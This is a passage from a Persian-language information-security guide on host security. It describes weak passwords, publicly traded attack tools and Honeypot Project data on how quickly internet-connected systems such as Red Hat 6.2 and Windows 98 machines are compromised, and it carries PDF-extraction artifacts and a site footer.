ﭘﺴﺘﻲ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺎﻳﻞ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ،ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ.
ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﺍﻳﻤـﻦ
ﻧﻤﻲﻛﻨﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻫﻨﻮﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ ﻛﻪ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺣﺪﺱﺯﺩﻥ ﻫﺴﺘﻨﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑﺮﺍﺣﺘـﻲ
ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ١٩٢ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ.
ﺍﻣﺮﻭﺯﻩ ﻫﺰﺍﺭﺍﻥ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻭ ﻧﻴﻤﻪﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ
ﺭﻭﺷﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﺒﺎﺩﻟﻪ ﻣﻲﻛﻨﻨﺪ؛ ﻓﻨﻮﻥ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻣﻞ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ،ﺻﻔﺤﺎﺕ ﻭﺏ ،ﻭ ﮔﻔﺘﮕﻮﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ) ١٩٣(IRCﺩﺭ ﺣﺪ ﻭﺳﻴﻌﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ،ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪ ﺍﻣﻨﻴﺘﻲ )ﺩﻳﺪﺑﺎﻧﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ،١٩٤ﻓﺎﻳﻠﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ،ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ( ﻧﻴﺰ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﭘﺮﻭﮊﺓ ﻛﻮﺯﺓ ﻋﺴﻞ (http://project.honypot.org/) ١٩٥ﻳﻚ ﭘﺮﻭﮊﺓ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺯﺍﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ
ﻼ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑﺮﺭﺳﻲ ﺳﺮﻋﺖ ﺍﻧﺠﺎﻡ ﺣﻤﻠﻪ ﺑﻪ ﺁﻧﻬﺎ ،ﮔﺴﺘﺮﺩﮔﻲ ﺟﺎﻣﻌﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻛﻨﺪ .ﻧﺘـﺎﻳﺞ ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﺍﺻـ ﹰ
ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨﺪﻩ ﻧﻴﺴﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ۲۰۰۱ﺍﻋﻼﻡ ﺷﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻳﺎﻓﺘﻪﻫﺎﻱ ﺍﻳﻦ ﭘﺮﻭﮊﻩ ،ﻳﻚ ﺳﻴـﺴﺘﻢ Red Hat 6.2ﺍﺯ
ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ ،ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﭘﺲ ﺍﺯ ﺗﻨﻬﺎ ۷۲ﺳﺎﻋﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺑﺎ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻧﻔـﻮﺫ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﻣـﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ .ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮﻟﻲ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺭﻭﺯ ﺑﺎﺭﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﭘﻮﻳﺶ ﻣﻲﺷﻮﺩ .ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ
ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windows 98ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ )ﻳﻜﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﺪﺓ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ( ﺩﺭ ﺁﻧﻬـﺎ
Host Security
Packet Sniffer Software
Internet Relay Chat
Password Sniffers
Honey Pot
191
192
193
194
195
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ ﺑﺮﺍﻱ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ
ﺐ ﻭﺍﺭﺩﻩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﺗـﺼﺎﻻﺕ ﭘﺮﺳـﺮﻋﺖ ﺍﻳﻨﺘﺮﻧﺘـﻲ
ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﺁﺳﻴ ﹺ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﻋﺮﺽ ﻣﺪﺕﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﭘﻮﻳﺶ ﻛﻨﻨﺪ.
٣٤٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻻ ﺩﺭ ﻫﻤﺎﻥ ﺭﻭﺯ ﺍﻭﻝ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ .ﺩﺭ ﻳـﻚ
ﻓﻌﺎﻝ ﺍﺳﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﺳﺎﻋﺘﻲ ﻳﻜﺒﺎﺭ ﭘﻮﻳﺶ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ
ﻣﻮﺭﺩ ،ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ۱۵ﺩﻗﻴﻘﻪ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ!
ﺍﻳﻦ ﺧﻴﺎﻟﭙﺮﺩﺍﺯﻱ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﺑﺎ ﺭﻋﺎﻳﺖ ﻓﻬﺮﺳﺘﻲ ﺍﺯ "ﺑﺎﻳﺪﻫﺎ" ﻭ "ﻧﺒﺎﻳﺪﻫﺎ" ﺩﺭ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑـﺎﻥ ﺭﺍ ﺗـﺄﻣﻴﻦ
ﻛﺮﺩ .ﻣﻤﻜﻦ ﺍﺳﺖ ﮔﻔﺘﻪ ﺷﻮﺩ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ،ﻣﻬﺎﺟﻢ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ،
ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻢ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻧﻤﺎﻳﻴـﺪ ،ﻭ ﺩﺭ
ﺍﻳﻨﺼﻮﺭﺕ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﻳﻤﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘـﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻲ ﻣﻬﺎﺟﻤﺎﻥ
ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﺷﺒﻜﻪ ﺧﺪﻣﺎﺗﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺁﻥ ﻣﺴﺪﻭﺩ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺳﺘﺮﺳ ﹺ
ﻻ ﺍﺯ
© Copyright 2025 Paperzz